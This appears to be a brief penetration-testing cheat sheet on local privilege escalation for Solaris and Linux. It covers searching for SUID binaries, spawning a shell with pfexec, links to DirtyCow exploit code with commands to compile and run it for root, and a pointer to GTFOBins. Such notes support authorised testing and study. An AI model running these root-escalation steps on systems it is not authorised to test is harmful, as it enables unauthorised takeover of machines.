Solaris

Exploit Suggester

Check for issues using Exploit Suggester

pfexec

The pfexec program is used to execute commands with the attributes specified by the user’s profiles in the exec_attr(4) database. It is invoked by the profile shells, pfsh, pfcsh, and pfksh which are linked to the Bourne shell, C shell, and Korn shell, respectively.

If we find SUID binary

Find / -perm -u=s -type f 2>/dev/null

pfexec bash

DirtyCow

https://github.com/exrienz/DirtyCow

https://github.com/dirtycow/dirtycow.github.io

Usage Example For 32 Bit

gcc dc32.c -o cowroot -pthread 
./cowroot 
echo 0 > /proc/sys/vm/dirty_writeback_centisecs 

Usage Example For 64 Bit

gcc dc64.c -o cowroot -pthread 
./cowroot 
echo 0 > /proc/sys/vm/dirty_writeback_centisecs 

GTFOBins

Consider looking for Sudo misconfiguration as well

More information on GTFOBins